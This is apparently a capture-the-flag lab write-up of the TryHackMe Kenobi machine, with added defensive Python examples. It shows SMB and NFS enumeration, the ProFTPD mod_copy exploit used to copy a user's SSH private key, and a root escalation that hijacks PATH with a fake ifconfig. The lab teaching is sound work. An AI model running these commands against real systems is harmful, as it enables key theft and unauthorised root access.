Kenobi - THM

#windows#smb

6 min read

easy
Pub. on 2022-06-02

Samba -> a network file sharing implementation built on the client-server Server Message Block (SMB) protocol. SMB was developed for Windows; Samba gives Linux machines access to the same shares.

SMB uses two ports: 139 (the older port, meant for local networks, carried over NetBIOS, an old transport layer) and 445 (added with Windows 2000 and later, runs directly over TCP and therefore works over the internet).

  1. Nmap scan
```
nmap 10.10.129.57 -vvv
Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-02 20:51 UTC
Initiating Ping Scan at 20:51
Scanning 10.10.129.57 [2 ports]
Completed Ping Scan at 20:51, 0.21s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 20:51
Completed Parallel DNS resolution of 1 host. at 20:51, 0.06s elapsed
DNS resolution of 1 IPs took 0.07s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating Connect Scan at 20:51
Scanning 10.10.129.57 [1000 ports]
Discovered open port 139/tcp on 10.10.129.57
Discovered open port 111/tcp on 10.10.129.57
Discovered open port 22/tcp on 10.10.129.57
Discovered open port 80/tcp on 10.10.129.57
Discovered open port 21/tcp on 10.10.129.57
Discovered open port 445/tcp on 10.10.129.57
Increasing send delay for 10.10.129.57 from 0 to 5 due to 28 out of 93 dropped probes since last increase.
Increasing send delay for 10.10.129.57 from 5 to 10 due to 21 out of 68 dropped probes since last increase.
Discovered open port 2049/tcp on 10.10.129.57
Completed Connect Scan at 20:51, 18.50s elapsed (1000 total ports)
Nmap scan report for 10.10.129.57
Host is up, received syn-ack (0.19s latency).
Scanned at 2022-06-02 20:51:40 UTC for 18s
Not shown: 993 closed tcp ports (conn-refused)
PORT     STATE SERVICE      REASON
21/tcp   open  ftp          syn-ack
22/tcp   open  ssh          syn-ack
80/tcp   open  http         syn-ack
111/tcp  open  rpcbind      syn-ack
139/tcp  open  netbios-ssn  syn-ack
445/tcp  open  microsoft-ds syn-ack
2049/tcp open  nfs          syn-ack
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 18.88 seconds
```
  1. Enumerate shares using nmap script
```
nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse 10.10.32.124
Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-02 21:34 UTC
Nmap scan report for 10.10.32.124
Host is up (0.20s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb-enum-shares:
|   account_used: guest
|   \\10.10.32.124\IPC$:
|     Type: STYPE_IPC_HIDDEN
|     Comment: IPC Service (kenobi server (Samba, Ubuntu))
|     Users: 1
|     Max Users: <unlimited>
|     Path: C:\tmp
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   \\10.10.32.124\anonymous:
|     Type: STYPE_DISKTREE
|     Comment:
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\home\kenobi\share
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   \\10.10.32.124\print$:
|     Type: STYPE_DISKTREE
|     Comment: Printer Drivers
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\var\lib\samba\printers
|     Anonymous access: <none>
|_    Current user access: <none>

Nmap done: 1 IP address (1 host up) scanned in 32.01 seconds
```
  1. Check out anonymous share, and download everything in it
```
smbget -R smb://10.10.32.124/anonymous
Password for [user] connecting to //anonymous/10.10.32.124:
Using workgroup WORKGROUP, user user
smb://10.10.32.124/anonymous/log.txt
Downloaded 11.95kB in 6 seconds
```

The Nmap port scan showed port 111 running rpcbind. This is just a server that converts remote procedure call (RPC) program numbers into universal addresses. When an RPC service is started, it tells rpcbind the address at which it is listening and the RPC program number it is prepared to serve. In this case, rpcbind gives access to a network file system (NFS, also listening on port 2049).

  1. Enumerate port 111 using nmap and some scripts
```
nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount 10.10.32.124
Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-02 21:57 UTC
Nmap scan report for 10.10.32.124
Host is up (0.25s latency).

PORT    STATE SERVICE
111/tcp open  rpcbind
| nfs-showmount:
|_  /var *

Nmap done: 1 IP address (1 host up) scanned in 2.18 seconds
```
  1. Search exploit-db.com for an exploit for the ProFTPD server, using its version number (1.3.5, as shown in the banner below). That version has an exploit against ProFTPD's mod_copy module.
  2. The mod_copy module implements the SITE CPFR and SITE CPTO commands, which copy files/directories from one place to another on the server. Any unauthenticated client can use these commands to copy files from any part of the file system to a chosen destination.
  3. Copy Kenobi's private key
```
nc 10.10.49.99 21
# 220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [10.10.49.99]
SITE CPFR /home/kenobi/.ssh/id_rsa
# 350 File or directory exists, ready for destination name
SITE CPTO /var/tmp/id_rsa
# 250 Copy successful
^C
```
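Added example, not part of the writeup: a small detector for the CPFR/CPTO pairing above, run over constructed FTP command log lines. The line format is an assumption (Apache-style, as ProFTPD's ExtendedLog can produce with a LogFormat of `%h %l %u %t "%r" %s`); the sample lines and the SENSITIVE list are constructed for the demo.

```python
import re

# Constructed sample lines (assumed LogFormat: %h %l %u %t "%r" %s).
SAMPLE_LOG = """\
10.0.0.5 - anonymous [02/Jun/2022:21:40:01 +0000] "USER anonymous" 331
10.0.0.5 - anonymous [02/Jun/2022:21:40:03 +0000] "SITE CPFR /home/kenobi/.ssh/id_rsa" 350
10.0.0.5 - anonymous [02/Jun/2022:21:40:04 +0000] "SITE CPTO /var/tmp/id_rsa" 250
10.0.0.9 - alice [02/Jun/2022:21:41:10 +0000] "RETR report.pdf" 226
"""

LINE_RE = re.compile(
    r'^(?P<host>\S+) \S+ (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<cmd>[^"]*)" (?P<status>\d+)$'
)
# Source locations that should never be the origin of a server-side copy.
SENSITIVE = ("/.ssh/", "/etc/shadow", "/etc/passwd", "/root/")


def find_mod_copy_abuse(log_text):
    """Return one finding per client that issued SITE CPFR followed by a
    successful SITE CPTO (status 250). The CPFR source is additionally
    flagged when it points at a sensitive location."""
    pending = {}   # host -> (user, time, source path) after a CPFR
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        host, user, cmd, status = m["host"], m["user"], m["cmd"], m["status"]
        parts = cmd.split(maxsplit=2)
        if len(parts) != 3 or parts[0] != "SITE":
            continue
        if parts[1] == "CPFR":
            pending[host] = (user, m["time"], parts[2])
        elif parts[1] == "CPTO" and status == "250":
            src = pending.pop(host, None)
            if src:
                findings.append({
                    "host": host, "user": src[0], "time": src[1],
                    "src": src[2], "dst": parts[2],
                    "sensitive": any(s in src[2] for s in SENSITIVE),
                })
    return findings


if __name__ == "__main__":
    for f in find_mod_copy_abuse(SAMPLE_LOG):
        print(f)
```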
  1. Since the /var directory was a mount, mount it on the file system
```
sudo mkdir /mnt/KenobiNFS
# [sudo] password for root:
mount 10.10.49.99:/var /mnt/KenobiNFS
# mount: /mnt/KenobiNFS: must be superuser to use mount.
#        dmesg(1) may have more information after failed mount system call.
sudo mount 10.10.49.99:/var /mnt/KenobiNFS
ls /mnt/KenobiNFS
# backups  cache  crash  lib  local  lock  log  mail  opt  run  snap  spool  tmp  www
```
  1. Get the private key and login to Kenobi's account via ssh
```
cp /mnt/KenobiNFS/tmp/id_rsa .
ssh -i id_rsa kenobi@10.10.49.99
```
  1. Check if root
```
ls /root
# ls: cannot open directory '/root': Permission denied
```

An example permission string with all three special bits set: rwSrwSrwT. A capital S or T means the special bit is set but the corresponding execute bit is not; a lower-case s or t means both are set.

SUID bit -> the user executes the file with the permissions of the file owner.

SGID bit -> for files, the user executes the file with the permissions of the group owner. For directories, files created inside inherit the directory's group owner.

Sticky bit -> applies to directories; users are prevented from deleting files belonging to other users.
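Added example, not part of the original writeup: decoding an ls-style permission string such as rwSrwSrwT, or the rwsr-xr-x shown later for /usr/bin/menu, into its numeric mode and naming the special bits. The function names are my own; the constants come from Python's stat module.

```python
import stat
from typing import List

# Plain permission bit for each of the nine positions (user, group, other).
POSITION_BITS = [stat.S_IRUSR, stat.S_IWUSR, stat.S_IXUSR,
                 stat.S_IRGRP, stat.S_IWGRP, stat.S_IXGRP,
                 stat.S_IROTH, stat.S_IWOTH, stat.S_IXOTH]
# Positions where a special bit can appear instead of plain 'x'.
SPECIAL_AT = {2: stat.S_ISUID, 5: stat.S_ISGID, 8: stat.S_ISVTX}


def parse_symbolic_mode(sym: str) -> int:
    """Turn a 9-character permission string ('rwsr-xr-x', 'rwSrwSrwT') into a
    numeric mode including SUID/SGID/sticky. Capital S/T: special bit set,
    execute bit clear. Lower-case s/t: both set."""
    if len(sym) != 9:
        raise ValueError("expected 9 permission characters")
    mode = 0
    for i, ch in enumerate(sym):
        if ch == "-":
            continue
        if i in SPECIAL_AT and ch in "sStT":
            mode |= SPECIAL_AT[i]
            if ch.islower():          # s/t also carries the execute bit
                mode |= POSITION_BITS[i]
            continue
        if ch != "rwx"[i % 3]:
            raise ValueError(f"unexpected {ch!r} at position {i}")
        mode |= POSITION_BITS[i]
    return mode


def special_bits(mode: int) -> List[str]:
    """Name the special bits set in a mode, in the order the text lists them."""
    names = []
    if mode & stat.S_ISUID:
        names.append("SUID")
    if mode & stat.S_ISGID:
        names.append("SGID")
    if mode & stat.S_ISVTX:
        names.append("sticky")
    return names


def is_root_suid(sym: str, owner: str) -> bool:
    """What the find command in the next step hunts for: SUID set, owned by root."""
    return owner == "root" and bool(parse_symbolic_mode(sym) & stat.S_ISUID)
```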

  1. Search the system for files having the SUID bit set
```
find / -perm -u=s -type f 2>/dev/null
# /sbin/mount.nfs
# /usr/lib/policykit-1/polkit-agent-helper-1
# /usr/lib/dbus-1.0/dbus-daemon-launch-helper
# /usr/lib/snapd/snap-confine
# /usr/lib/eject/dmcrypt-get-device
# /usr/lib/openssh/ssh-keysign
# /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
# /usr/bin/chfn
# /usr/bin/newgidmap
# /usr/bin/pkexec
# /usr/bin/passwd
# /usr/bin/newuidmap
# /usr/bin/gpasswd
# /usr/bin/menu
# /usr/bin/sudo
# /usr/bin/chsh
# /usr/bin/at
# /usr/bin/newgrp
# /bin/umount
# /bin/fusermount
# /bin/mount
# /bin/ping
# /bin/su
# /bin/ping6
```

Investigate these files. /usr/bin/menu is not a standard binary, so check it out and run strings on it: it calls curl, uname and ifconfig without their full paths, so those names are resolved through the caller's PATH.

  1. Do a privilege escalation with PATH variable manipulation
```
ls /usr/bin/menu -la
# -rwsr-xr-x 1 root root 8880 Sep  4  2019 /usr/bin/menu
echo /bin/sh > /tmp/ifconfig
export PATH=/tmp:$PATH
chmod 777 /tmp/ifconfig
/usr/bin/menu
# ***************************************
# 1. status check
# 2. kernel version
# 3. ifconfig
# ** Enter your choice :3
ls
# share  user.txt
ls /root
# root.txt
cat /root/root.txt
# 177***************************
```
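Added example, not code from the writeup or the room: the root cause above is a setuid program resolving bare command names through the caller's PATH. This block contrasts that lookup with a fixed trusted search path and a scrubbed child environment; `exists` is a hypothetical injectable predicate so the functions can be exercised on constructed paths, and TRUSTED_PATH is my own choice of directories.

```python
import os
from typing import Callable, Dict, Optional

# Directories a privileged helper trusts, regardless of the caller's PATH.
TRUSTED_PATH = ("/usr/sbin", "/usr/bin", "/sbin", "/bin")
# Inherited variables that let a caller steer what a child process runs or loads.
DANGEROUS_VARS = ("PATH", "LD_PRELOAD", "LD_LIBRARY_PATH", "IFS")


def resolve_via_caller_path(cmd: str, path_env: str,
                            exists: Callable[[str], bool] = os.path.isfile) -> Optional[str]:
    """Shell-style lookup of a bare command name: first hit in PATH order.
    This is what the setuid menu binary inherits when it runs 'ifconfig'
    instead of '/sbin/ifconfig' under the caller's environment."""
    for d in path_env.split(os.pathsep):
        candidate = os.path.join(d or ".", cmd)   # empty entry means cwd
        if exists(candidate):
            return candidate
    return None


def resolve_trusted(cmd: str,
                    exists: Callable[[str], bool] = os.path.isfile) -> Optional[str]:
    """Lookup a setuid program should use instead: bare names are searched only
    in a fixed list of system directories; the caller's PATH is never consulted."""
    if "/" in cmd:
        raise ValueError("expected a bare command name")
    for d in TRUSTED_PATH:
        candidate = os.path.join(d, cmd)
        if exists(candidate):
            return candidate
    return None


def hardened_env(base: Optional[Dict[str, str]] = None) -> Dict[str, str]:
    """Environment to pass to children of a privileged helper: drop variables a
    caller could use to redirect execution and pin PATH to TRUSTED_PATH."""
    source = os.environ if base is None else base
    env = {k: v for k, v in source.items() if k not in DANGEROUS_VARS}
    env["PATH"] = os.pathsep.join(TRUSTED_PATH)
    return env
```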
** THE END **